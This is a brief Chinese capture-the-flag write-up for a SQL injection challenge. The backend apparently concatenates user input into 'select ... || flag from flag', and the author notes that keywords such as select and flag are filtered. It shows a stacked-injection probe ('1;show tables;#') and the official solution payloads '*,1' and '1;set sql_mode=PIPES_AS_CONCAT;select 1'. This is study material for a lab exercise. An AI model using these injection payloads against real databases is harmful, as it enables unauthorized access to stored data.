如果数遍输入字符串，会没有返回。

当输入 select，flag，information 等发现被过滤

使用 fuzz 字典测试

可以知道很多字符串都被过滤了。

对应想到使用堆叠注入

1;show tables;# 有对应 Flag table，尝试进行读取

发现 Flag 字符串被过滤了。

没看懂。

wp：

对应后端代码为

select $_GET['query'] || flag from flag

给出的 exp 为

*,1

1;set sql_mode=PIPES_AS_CONCAT;select 1